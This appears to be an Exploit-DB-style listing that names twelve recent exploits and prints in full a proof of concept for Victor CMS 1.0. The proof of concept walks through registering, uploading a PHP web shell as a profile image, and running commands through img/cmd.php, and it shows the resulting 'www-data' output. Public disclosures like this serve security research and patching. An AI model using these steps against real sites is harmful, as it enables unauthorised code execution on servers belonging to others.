
12 changes to exploits/shellcodes 10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH) Victor CMS 1.0 - File Upload To RCE Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated) CSE Bookstore 1.0 - Multiple SQL Injection Library Management System 3.0 - _Add Category_ Stored XSS Multi Branch School Management System 3.5 - _Create Branch_ Stored XSS WordPress Plugin W3 Total Cache - Unauthenticated Arbitrary File Read (Metasploit) Webmin 1.962 - 'Package Updates' Escape Bypass RCE (Metasploit) Artworks Gallery Management System 1.0 - 'id' SQL Injection Faculty Evaluation System 1.0 - Stored XSS TerraMaster TOS 4.2.06 - RCE (Unauthenticated)
19 lines
No EOL
640 B
Text
19 lines
No EOL
640 B
Text
# Exploit Title: Victor CMS 1.0 - File Upload To RCE
|
|
# Date: 20.12.2020
|
|
# Exploit Author: Mosaaed
|
|
# Vendor Homepage: https://github.com/VictorAlagwu/CMSsite
|
|
# Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip
|
|
# Version: 1.0
|
|
|
|
# Tested on: Apache2/Linux
|
|
|
|
Step1: register http://localhost/CMSsite-master/register.php
|
|
step2: login as user
|
|
step3: Go to Profile
|
|
step4: upload imag as php file (upload shell.php)
|
|
step5: update user
|
|
step6: You will find your shell in img folder :/path/img/cmd.php
|
|
|
|
http://localhost/CMSsite-master/img/cmd.php?cmd=id
|
|
|
|
uid=33(www-data) gid=33(www-data) groups=33(www-data) |